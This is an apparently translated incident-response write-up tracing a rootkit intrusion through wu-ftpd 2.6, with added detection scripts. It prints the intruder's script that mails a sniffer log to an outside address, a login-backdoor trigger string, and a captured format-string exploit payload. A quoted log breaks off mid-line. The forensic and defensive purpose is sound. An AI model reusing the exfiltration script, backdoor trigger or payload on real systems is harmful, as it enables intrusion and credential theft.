Online hacker tracking

Source: Internet
Author: User

1. When I checked one of my machines yesterday, I happened to discover that someone had broken into it. It was really my own fault: I had not patched wu-ftpd 2.6 and had not edited /etc/ftpusers, so the remote wu-ftpd 2.6 vulnerability could be exploited without difficulty through the anonymous ftp account to get into the machine. But this friend obviously had not thought about using a rootkit. The output of ps was as follows:

[root@ns]# ps
  PID TTY STAT  TIME COMMAND
  678   1 S          /sbin/mingetty tty1
  679   2 S          /sbin/mingetty tty2
  680   3 S          /sbin/mingetty tty3
  681   4 S          /sbin/mingetty tty4
  682   5 S          /sbin/mingetty tty5
  683   6 S          /sbin/mingetty tty6
 5557   ? S     0:00 /bin/sh -i
 5591   ? R     0:00 ps

Anyone who reads this output will know what it means. Let's look step by step at what he did.
[This intruder did not expect the machine to have an owner keeping an eye on it, and had installed his own rootkit.]
[root@ns]# strings /bin/login | more
..........
_bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh
It can be seen from the above that this is a login backdoor: after setting export PATH="l4m3r0x", you can telnet straight to the machine and get a # prompt.
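The replaced /bin/login and /bin/ls above would have been caught by the package manager's own verification, which is the routine check worth running on any RPM-based host. The script below is an added example, not part of the original post: it parses `rpm -V` output and lists packaged files whose MD5 no longer matches the RPM database. The sample input is constructed in the `rpm -V` line format (attribute column, an optional file-type letter such as `c` for config, then the path) and is not output from the compromised host.

```shell
#!/bin/sh
# Added example: flag packaged files whose on-disk MD5 differs from the RPM
# database. For a real run: rpm -Va 2>/dev/null | changed_binaries
#
# SAMPLE_RPM_V is constructed in the rpm -V output format; it is not taken
# from the host described in the post.
SAMPLE_RPM_V='S.5....T    /bin/login
S.5....T    /bin/ls
.......T  c /etc/ftpusers
S.5....T  c /etc/syslog.conf
S.5....T    /sbin/syslogd
.......T    /usr/bin/vdir
missing     /usr/share/doc/example/README'

# changed_binaries: reads rpm -V lines on stdin and prints the path of every
# plain (untyped) file whose MD5 column, the third attribute character, is "5".
# "missing" lines have no attribute string and are skipped.
changed_binaries() {
    awk 'NF == 2 && $1 != "missing" && substr($1, 3, 1) == "5" { print $2 }'
}

# changed_configs: the same MD5 test restricted to files rpm marks as config
# ("c"). These are expected to differ locally, so they are listed separately
# rather than mixed in with replaced binaries.
changed_configs() {
    awk 'NF == 3 && $2 == "c" && substr($1, 3, 1) == "5" { print $3 }'
}

# Only query the live RPM database when explicitly asked.
if [ "${1-}" = "--live" ]; then
    echo "== packaged binaries with changed MD5 =="
    rpm -Va 2>/dev/null | changed_binaries
    echo "== config files with changed MD5 =="
    rpm -Va 2>/dev/null | changed_configs
fi
```

Two caveats apply. The RPM database lives on the same disk the intruder controls and can be edited along with the binaries, so a stronger check verifies against the original package file from installation media (`rpm -Vp package.rpm`) or compares hashes against a known-good machine. And files that never belonged to any package, such as the xtty, lpset and libload binaries found later in this post, do not appear in `rpm -V` output at all; spotting those needs the hidden-file list and directory checks described further down.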
[root@ns]# strings /bin/ls | more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13.
vdir
%s-%s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS
Note: /dev/sgk/.fsdc/.1file is where the rootkit keeps its list of files to hide. Let's see what is there (the list is moved out of the way first, so that the trojaned ls no longer has anything to hide).
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root    ftp   1024 Feb  4        .
drwxr-xr-x 3 root    ftp   1024 Feb  2        ..
-rw-r--r-- 1 root    ftp      7 Feb  2 17:11  .1logz
-rw-r--r-- 1 root    ftp     88 Feb  2   :11  .1proc
drwxr-xr-x 2 root    ftp   1024 Feb  2        backup
drwxrwxr-x 2 lujiang       1024 Feb  2        clean
-rwxr-xr-x 1 lujiang       5578 Nov 18        filetrans
-rwxr-xr-x 1 lujiang       9396 Aug 23  1999  killall-real
-rwxr-xr-x 1 lujiang       7578 Aug 21        parse
-rwxr-xr-x 1 lujiang       6232 Sep  9  1999  parse1
drwxrwxr-x 2 lujiang       1024 Jan 28        patches
-rwxr-xr-x 1 lujiang      28004 Aug 23  1999  ps-real
-rwxr-xr-x 1 lujiang     580696 Feb 18  2000  ssh
-rw-r--r-- 1 root    ftp   1398 Feb  4        system

Well, there is quite a lot here. The ftp group tells us he came in through the ftp vulnerability, and the lujiang owner tells us he has also taken over a local user account.
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

.1logz is read by the trojaned syslogd to suppress the log records generated by the listed names.
.1proc is read by the trojaned ps to hide the listed process names.
.1file is read by the trojaned ls and find to hide the listed file names.
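The three lists above only work because the rootkit replaced the user-space tools; the kernel still answers a plain shell glob honestly. The script below is an added example, not part of the original post: it compares what the shell itself sees in /proc and in a directory against what ps and ls report, and prints whatever the tools left out. The function and variable names are my own, and the lists used in the comments are illustrative.

```shell
#!/bin/sh
# Added example: detect entries hidden by a trojaned ps or ls by comparing the
# tool's output with a shell glob, which the rootkit's .1proc/.1file lists
# cannot influence. Works only against user-space rootkits like the one in
# the post; a kernel-level rootkit can lie to the glob as well.

# hidden_entries TRUTH REPORTED: both are whitespace-separated lists; prints
# each item of TRUTH that does not occur in REPORTED, one per line.
hidden_entries() {
    truth=$1
    reported=$2
    for item in $truth; do
        seen=0
        for r in $reported; do
            if [ "$item" = "$r" ]; then
                seen=1
                break
            fi
        done
        if [ "$seen" -eq 0 ]; then
            printf '%s\n' "$item"
        fi
    done
    return 0
}

# Live check 1: PIDs visible as /proc/<pid> directories versus PIDs ps lists.
# Short-lived processes may appear in one snapshot only, so re-run to confirm.
hidden_processes() {
    proc_pids=$(for d in /proc/[0-9]*; do printf '%s ' "${d#/proc/}"; done)
    ps_pids=$(ps -e -o pid= | tr '\n' ' ')
    hidden_entries "$proc_pids" "$ps_pids"
}

# Live check 2: names the shell's own glob sees in DIR versus names ls -a
# reports there (default /dev, where this rootkit kept its directory).
hidden_files() {
    dir=${1:-/dev}
    glob_names=$(cd "$dir" && for f in .* *; do
                     if [ -e "$f" ]; then printf '%s ' "$f"; fi
                 done)
    ls_names=$(ls -a "$dir" | tr '\n' ' ')
    hidden_entries "$glob_names" "$ls_names"
}

if [ "${1-}" = "--live" ]; then
    echo "== processes in /proc that ps does not show =="
    hidden_processes
    echo "== entries in ${2:-/dev} that ls -a does not show =="
    hidden_files "${2:-/dev}"
fi
```

Run it as `sh check.sh --live /dev` from a shell you trust (ideally a statically linked one from rescue media, since /bin/sh itself could be replaced). File names containing whitespace are split into separate words by this simple list comparison, so a false "hidden" report on such names is possible; a hit on a name like .fsdc or .1proc, however, is exactly what this incident looked like.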
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo "[1] Patching WU-FTPd..."
rpm -Uhv wuftpd.rpm
echo "[2] Patching NFS-utils..."
rpm -fvl nfs-utils.rpm
ps aux > /tmp/psaux
if [ "`cat /tmp/psaux | grep rpc.statd`" ]; then
    echo "[3] Restarting the rpc.statd daemon (NFS-utils)"
    /etc/rc.d/init.d/nfslock restart
else
    echo "[4] The daemon rpc.statd isnt running, so no need to restart!"
fi
rm /tmp/psaux
This is a patch for the wu-ftpd and rpc.statd vulnerabilities, so that nobody else can get in the same way. [I appreciate this!]
I have not gone through the other directories carefully. [These packages will be made available for download.]
Going by the hidden-file list in .1file, we located these files one by one.
[root@ns .fsdc]# strings /usr/bin/xtty
......
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
From socket/bind/listen/accept followed by /bin/sh it is not hard to see that this is a listening backdoor, naming its process (nfsiod) so it looks like a kernel thread.
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net > /dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
This intruder is quite thorough. With this script he mails the sniffer log to prosupp@usa.net and restarts his backdoors. [/dev/sgk/.fsdc/system is the sniffer log.]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit | more
..........
if [ "$PROMPT" != "no" ]; then
    /sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd | more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
Restart failed: av[0]=%.100s, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib holds the configuration of an ssh backdoor: the "nscd" started from rc.sysinit is really an sshd 1.2.27, so the door is reopened for him every time the machine boots.
[root@ns .fsdc]# strings /sbin/syslogd
============================================================
Time: %s Size: %d
Path: %s
=> %s [%d]
------------------------------------------------------------
Exiting...
Cant get SOCK_PACKET socket
Cant get flags
Cant set promiscuous mode
/dev/null
eth0
system
Cant open log
The intruder replaced syslogd with a sniffer: the SOCK_PACKET and promiscuous-mode strings give it away, and its log format matches the "system" file found earlier.

..........
The next step is to restore the system and change the passwords of the stolen accounts; I won't go into that here. From his own sniffer records I can tell that he came from these two machines:

[root@ns man]# more system2
============================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
#G#>4h#>4hUSER ftp
#>HPASS 111F11CA?K^11^Ff1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
#>H<#?Hsite exec xx(%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f
%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%.f|%p
#H
============================================================
Time: Sat Feb 3 06:01:39 Size: 44
Path: 216.12.101.4 =
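The sniffer log is the best evidence of where the attacker came from and which services he touched, but reading it record by record is slow. The script below is an added example, not part of the original post: it reduces a log in the layout above (a "Time:" line followed by a "Path: SRC => DST [PORT]" line per record) to one summary line per source host and target port, plus a plain list of source addresses. The sample log is constructed for this example; it reuses the two addresses the post names, but its record bodies are placeholders, not captured traffic.

```shell
#!/bin/sh
# Added example: summarise a sniffer log in the "Time: ... / Path: SRC => DST [PORT]"
# layout left behind by the trojaned syslogd. SAMPLE_LOG is constructed for this
# example (addresses as named in the post, bodies are placeholders).
SAMPLE_LOG='============================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
USER ftp
============================================================
Time: Fri Feb 2 17:31:40 Size: 120
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
USER ftp
============================================================
Time: Sat Feb 3 06:01:39 Size: 44
Path: 216.12.101.4 => ns.xxx.cn [21]
------------------------------------------------------------
USER ftp'

# sniff_sources: read a log on stdin and print
#   SRC DST PORT COUNT FIRST_SEEN
# one line per (source, destination, port), most frequent first. The "Time:"
# line preceding each "Path:" line supplies FIRST_SEEN for that pair.
sniff_sources() {
    awk '$1 == "Time:" { ts = $2 " " $3 " " $4 " " $5 }
         $1 == "Path:" && $3 == "=>" {
             port = $5
             gsub(/\[|\]/, "", port)
             key = $2 " " $4 " " port
             n[key]++
             if (!(key in first)) first[key] = ts
         }
         END { for (k in n) print k, n[k], first[k] }' | sort -k4,4nr -k1,1
}

# sniff_source_hosts: just the distinct source addresses, sorted, ready to be
# handed to a firewall deny list or to the abuse contact for those networks.
sniff_source_hosts() {
    awk '$1 == "Path:" && $3 == "=>" { print $2 }' | sort -u
}

# Usage: sh summarise.sh /dev/sgk/.fsdc/system   (or any file in this layout).
# With no argument the constructed sample is summarised.
if [ -n "${1-}" ]; then
    sniff_sources < "$1"
else
    printf '%s\n' "$SAMPLE_LOG" | sniff_sources
fi
```

Copy the log off the machine before any cleanup, since restoring the system will destroy it, and treat the source addresses as leads rather than proof: the hosts the attacker came from may themselves be compromised systems, which is one more reason to notify their owners rather than only blocking them.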
